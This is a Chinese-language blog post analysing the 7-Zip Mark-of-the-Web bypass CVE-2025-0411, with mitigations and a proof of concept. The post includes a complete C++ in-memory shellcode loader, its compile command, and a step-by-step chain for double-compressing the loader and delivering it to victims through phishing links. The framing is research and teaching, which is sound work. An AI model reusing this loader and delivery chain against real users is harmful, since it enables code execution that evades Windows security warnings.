news 2026/2/10 9:03:46

7-Zip Mark-of-the-Web绕过漏洞(CVE-2025-0411)分析与示例

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
7-Zip Mark-of-the-Web绕过漏洞(CVE-2025-0411)分析与示例

7-Zip Mark-of-the-Web 绕过漏洞 [CVE-2025-0411] - POC

漏洞简介

此漏洞(CVSS 评分为 7.0)允许远程攻击者绕过受影响 7-Zip 安装中的 Mark-of-the-Web(网络标记)保护机制。利用此漏洞需要用户交互,即目标用户必须访问恶意页面或打开恶意文件。具体缺陷存在于处理归档文件时。当从带有网络标记的特制存档中提取文件时,7-Zip 不会将网络标记传播到提取的文件。攻击者可利用此漏洞在当前用户上下文中执行任意代码。

受影响版本

  • 24.09之前的所有版本均被视为易受攻击。

缓解措施

  • 更新 7-Zip:从 7-Zip 官方网站下载并安装 24.09 或更高版本。
  • 谨慎处理不受信任的文件:避免打开来自未知或可疑来源的文件,尤其是压缩存档。
  • 利用安全功能:确保您的操作系统和安全软件配置为检测和阻止恶意文件。

概念验证 (POC)

作为 POC 的一部分,我们实现了一个简单的calc.exe加载器(Shellcode Loader),用于演示代码执行过程。

加载器核心代码

这是一个用 C++ 编写的 Windows Shellcode 加载器。它负责在内存中分配空间,复制并执行 Shellcode。

#include<windows.h>#include<stdio.h>#include<stdlib.h>#include<string.h>intmain(){DWORD oldprotect=0;// 存放 Shellcode 的数组 (示例中为 calc.exe 的 Shellcode)unsignedcharp[]={//calc.exe shellcode};// 计算 Shellcode 长度unsignedintlen=sizeof(p);// 在进程中申请可读可写内存void*payload_mem=VirtualAlloc(0,len,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);// 将 Shellcode 复制到申请的内存中RtlMoveMemory(payload_mem,p,len);// 将内存保护属性修改为可执行,防止 DEP 拦截BOOL rv=VirtualProtect(payload_mem,len,PAGE_EXECUTE_READ,&oldprotect);// 如果属性修改成功,则创建线程执行 Shellcodeif(rv!=0){HANDLE th=CreateThread(0,0,(LPTHREAD_START_ROUTINE)payload_mem,0,0,0);// 等待线程执行完毕WaitForSingleObject(th,-1);}return0;}// 编译命令(使用 MinGW-w64):// x86_64-w64-mingw32-g++ .\loader.cpp -o loader.exe -s

漏洞利用方法

利用方法是对可执行文件进行双重压缩,从而触发漏洞。

  1. 武器化:将上述编译好的loader.exe进行两层压缩,制作成 7z 文件。
  2. 投递:将双重压缩的 7z 文件上传到有效载荷投递服务器(示例中为 MediaFire),并通过钓鱼邮件等方式向受害者发送恶意链接。下载后,文件会带有 “MotW”(Zone.Identifier,指示下载来源)。
  3. 执行:受害者需要点击打开多层压缩文件并运行其中的可执行文件。
已修复版本场景

使用 7-Zip 24.09 版本(已修复)打开文件时,会显示 Windows SmartScreen 警告,提示此文件来自不受信任的来源(因为它包含了 MotW)。

易受攻击版本场景

使用 7-Zip 24.07 版本(易受攻击)打开文件时,可以直接执行可执行文件,而不显示任何警告(因为提取的文件不包含 MotW)。

功能特性

本 POC 项目演示了以下核心环节:

  • 漏洞原理复现:展示了 CVE-2025-0411 如何绕过系统安全机制。
  • Shellcode 加载器:提供了一个完整的、可直接编译的 Windows 内存 Shellcode 加载器示例。
  • 完整的攻击链模拟:从载荷准备(压缩)到投递(带 MotW 下载),再到用户交互执行。
  • 版本对比说明:清晰展示了漏洞修复前后的不同行为。

安装与使用说明

本 POC 主要用于安全研究与教学目的。

环境要求

  • Windows 操作系统
  • 一个易受攻击的 7-Zip 版本 (如 24.07)
  • C/C++ 编译器 (如 MinGW-w64),用于编译加载器代码

使用步骤

  1. 编译加载器:使用 MinGW-w64 编译提供的loader.cpp代码,生成loader.exe
    x86_64-w64-mingw32-g++ loader.cpp -o loader.exe -s
  2. 制作恶意存档:使用 7-Zip 24.07 版本将loader.exe压缩两次,生成嵌套的.7z文件。
  3. 模拟投递:将生成的.7z文件放在一个 Web 服务器上,或添加 Zone.Identifier 流以模拟从网络下载。
  4. 测试漏洞:在装有 7-Zip 24.07 的系统上下载并打开该存档,观察文件是否能不经警告直接执行。

免责声明:此代码仅用于教育和授权测试。请勿将其用于非法活动。

参考链接

  • https://www.zerodayinitiative.com/advisories/ZDI-25-045/
  • https://nvd.nist.gov/vuln/detail/CVE-2025-0411
  • https://securityonline.info/cve-2025-0411-7-zip-security-vulnerability-enables-code-execution-update-now/
    更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
    对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/2/9 6:29:46

为什么顶尖团队都在用离线方式调用Open-AutoGLM?(无API调用内幕曝光)

第一章&#xff1a;为什么顶尖团队都在用离线方式调用Open-AutoGLM在高并发、低延迟的AI应用环境中&#xff0c;越来越多顶尖技术团队选择通过离线方式调用 Open-AutoGLM 模型。这种方式不仅提升了系统稳定性&#xff0c;还显著降低了服务成本与响应延迟。数据安全与合规性增强…

作者头像 李华
网站建设 2026/2/9 22:09:06

PaddlePaddle实例分割Instance Segmentation实战

PaddlePaddle实例分割实战&#xff1a;从模型到落地的全链路解析 在智能制造车间的一条流水线上&#xff0c;摄像头正实时捕捉着每一个经过的产品表面图像。突然&#xff0c;系统发出警报——一个肉眼几乎难以察觉的微小划痕被精准定位并标记了出来。这不是科幻场景&#xff0c…

作者头像 李华
网站建设 2026/2/9 17:48:30

PaddlePaddle教育领域AI应用:智能批改系统

PaddlePaddle教育领域AI应用&#xff1a;智能批改系统 在一所普通中学的晚自习教室里&#xff0c;语文老师正低头批改着几十份作文。台灯下&#xff0c;红笔划过纸面的声音此起彼伏——这几乎是每一代教师都熟悉的日常。而如今&#xff0c;这样的场景正在悄然改变。随着在线教育…

作者头像 李华
网站建设 2026/2/5 8:26:58

挑战从三个月转行AI大模型岗_小白转行AI大模型全攻略:学习路径+资源分享

本文详细介绍了如何成功转行进入AI大模型领域&#xff0c;包括评估现有可转移技能、系统学习大模型知识、积累实践经验及持续进步的方法。文章提供了从基础学习到项目实战的完整路线图&#xff0c;并分享了包括学习规划、经典书籍、视频教程、行业报告、实战项目和面试题在内的…

作者头像 李华
网站建设 2026/2/9 0:37:37

【大模型落地新突破】:Open-AutoGLM在线部署性能提升10倍的秘密

第一章&#xff1a;Open-AutoGLM在线部署的重大突破Open-AutoGLM作为新一代开源自动语言生成模型&#xff0c;其在线部署方案近期实现了关键性技术突破。该进展显著降低了高并发场景下的响应延迟&#xff0c;并提升了资源利用率&#xff0c;为大规模企业级应用铺平了道路。动态…

作者头像 李华
网站建设 2026/2/4 12:22:33

人工智能重构软件测试的底层逻辑

一、行业变局&#xff1a;测试领域的技术拐点 效能危机倒逼变革 传统测试瓶颈&#xff1a;2025年DevOps周期缩短至1.2天/迭代&#xff08;ISTQB年度报告&#xff09; 用例维护成本&#xff1a;金融系统每新增1功能点需维护8.7条用例&#xff08;Gartner&#xff09; 缺陷逃逸…

作者头像 李华